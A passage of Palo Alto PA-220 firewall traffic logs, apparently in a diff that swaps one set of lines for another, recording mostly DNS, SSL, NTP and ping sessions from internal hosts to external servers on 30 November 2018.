16:09:46,24195,1,35827,53,13498,53,0x400019,udp,allow,252,83,169,2,2018/11/30 16:09:13,0,any,0,32091165,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24124,1,60609,53,20365,53,0x400019,udp,allow,232,100,132,2,2018/11/30 16:09:13,0,any,0,32091166,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24153,1,3248,53,61464,53,0x400019,udp,allow,206,79,127,2,2018/11/30 16:09:13,0,any,0,32091167,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24122,1,49284,53,42877,53,0x400019,udp,allow,194,89,105,2,2018/11/30 16:09:13,0,any,0,32091168,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24171,1,57732,53,5918,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:13,0,any,0,32091169,0x0,192.168.0.0-192.168.255.255,United 
States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24069,1,49195,53,28944,53,0x400019,udp,allow,212,78,134,2,2018/11/30 16:09:13,0,any,0,32091170,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24282,1,17266,53,13415,53,0x400019,udp,allow,252,73,179,2,2018/11/30 16:09:13,0,any,0,32091171,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24218,1,48631,53,2489,53,0x400019,udp,allow,308,90,218,2,2018/11/30 16:09:13,0,any,0,32091172,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24200,1,58540,53,49328,53,0x400019,udp,allow,249,77,172,2,2018/11/30 16:09:13,0,any,0,32091173,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:46,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24224,1,42678,53,36036,53,0x400019,udp,allow,379,74,305,2,2018/11/30 16:09:13,0,any,0,32091174,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,66.28.0.45,192.168.1.63,66.28.0.45,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24240,1,16576,53,33744,53,0x400019,udp,allow,603,76,527,2,2018/11/30 16:09:14,0,any,0,32091175,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24183,1,39830,53,45809,53,0x400019,udp,allow,242,89,153,2,2018/11/30 16:09:14,0,any,0,32091176,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24211,1,6185,53,3675,53,0x400019,udp,allow,240,71,169,2,2018/11/30 16:09:14,0,any,0,32091177,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:09:47,24253,1,8781,53,5787,53,0x400019,udp,allow,208,80,128,2,2018/11/30 16:09:14,0,any,0,32091178,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24221,1,16788,53,12342,53,0x400019,udp,allow,253,72,181,2,2018/11/30 16:09:14,0,any,0,32091179,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24310,1,45307,53,18729,53,0x400019,udp,allow,197,76,121,2,2018/11/30 16:09:14,0,any,0,32091180,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,23.52.174.25,192.168.1.63,23.52.174.25,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24326,1,52520,80,57858,80,0x400053,tcp,allow,1927,681,1246,11,2018/11/30 16:09:29,0,computer-and-internet-info,0,32091181,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24201,1,8503,53,2722,53,0x400019,udp,allow,394,79,315,2,2018/11/30 16:09:13,1,any,0,32091182,0x0,192.168.0.0-192.168.255.255,United 
States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24130,1,6910,53,6674,53,0x400019,udp,allow,212,82,130,2,2018/11/30 16:09:14,0,any,0,32091183,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,54.230.5.228,192.168.1.63,54.230.5.228,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24237,1,52475,443,37427,443,0x40001c,tcp,allow,642,354,288,9,2018/11/30 16:09:17,12,any,0,32091184,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24108,1,14342,53,22408,53,0x400019,udp,allow,225,76,149,2,2018/11/30 16:09:14,0,any,0,32091185,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24247,1,48197,53,27899,53,0x400019,udp,allow,273,71,202,2,2018/11/30 16:09:15,0,any,0,32091186,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:48,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24098,1,32296,53,52939,53,0x400019,udp,allow,270,75,195,2,2018/11/30 16:09:15,0,any,0,32091187,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.195,208.83.246.20,192.168.1.63,208.83.246.20,new_outbound_from_trust,,,ntp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24263,1,33870,123,42907,123,0x400053,udp,allow,180,90,90,2,2018/11/30 16:09:15,0,any,0,32091188,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.196,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24258,1,54659,53,19658,53,0x400019,udp,drop ICMP,340,148,192,4,2018/11/30 16:09:16,0,any,0,32091189,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24155,1,57446,53,64352,53,0x400019,udp,reset client,291,83,208,2,2018/11/30 16:09:16,0,any,0,32091190,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:09:49,24232,1,22655,53,60126,53,0x400019,udp,reset server,184,84,100,2,2018/11/30 16:09:16,0,any,0,32091191,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,35.185.88.112,192.168.1.63,35.185.88.112,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24330,1,52509,443,59771,443,0x40001a,tcp,reset both,9290,2053,7237,24,2018/11/30 16:09:21,10,business-and-economy,0,32091192,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,23960,1,27192,53,35748,53,0x400019,udp,allow,202,93,109,2,2018/11/30 16:09:16,0,any,0,32091193,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24236,1,30221,53,63701,53,0x400019,udp,allow,200,84,116,2,2018/11/30 16:09:16,0,any,0,32091194,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24276,1,30570,53,57872,53,0x400019,udp,allow,160,64,96,2,2018/11/30 
16:09:16,0,any,0,32091195,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24299,1,52497,443,37581,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091196,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24229,1,52498,443,19226,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091197,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24283,1,52496,443,61721,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091198,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,104.254.150.9,192.168.1.63,104.254.150.9,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24369,1,52510,443,10098,443,0x40001a,tcp,allow,10511,2691,7820,22,2018/11/30 
16:09:21,11,web-advertisements,0,32091199,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24354,1,52495,443,4564,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091200,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,52.0.218.108,192.168.1.63,52.0.218.108,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24254,1,52486,443,32104,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091201,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,52.6.117.19,192.168.1.63,52.6.117.19,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24246,1,52489,443,14172,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091202,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,34.238.96.22,192.168.1.63,34.238.96.22,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24343,1,52490,443,10286,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091203,0x0,192.168.0.0-192.168.255.255,United 
States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,130.211.47.17,192.168.1.63,130.211.47.17,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24262,1,52493,443,30799,443,0x40001c,tcp,allow,556,276,280,8,2018/11/30 16:09:20,12,any,0,32091204,0x0,192.168.0.0-192.168.255.255,United States,0,4,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:51 PA-220 1,2018/11/30 16:09:51,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:51,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:51,24281,1,59320,53,13490,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:18,0,any,0,32091205,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24424,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:37,0,any,0,32091206,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24230,1,13076,53,53751,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091207,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 
16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24243,1,5511,53,21643,53,0x400019,udp,allow,242,72,170,2,2018/11/30 16:09:19,0,any,0,32091208,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24077,1,9799,53,22446,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091209,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24266,1,39169,53,22301,53,0x400019,udp,allow,172,78,94,2,2018/11/30 16:09:19,0,any,0,32091210,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 -Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:52,24269,1,42476,53,58124,53,0x400019,udp,allow,238,72,166,2,2018/11/30 16:09:19,0,any,0,32091211,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:08 PA-220 1,2018/11/30 16:09:07,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:07,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,apple-maps,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 
16:09:07,22751,1,55113,443,16418,443,0x400053,tcp,allow,7734,1758,5976,36,2018/11/30 15:59:04,586,computer-and-internet-info,0,32091112,0x0,192.168.0.0-192.168.255.255,United States,0,16,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24223,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:08:55,0,any,0,32091113,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24138,1,55114,80,51990,80,0x40001c,tcp,allow,1574,539,1035,11,2018/11/30 16:08:51,1,computer-and-internet-info,0,32091114,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,24043,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:01,0,any,0,32091115,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,quic,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 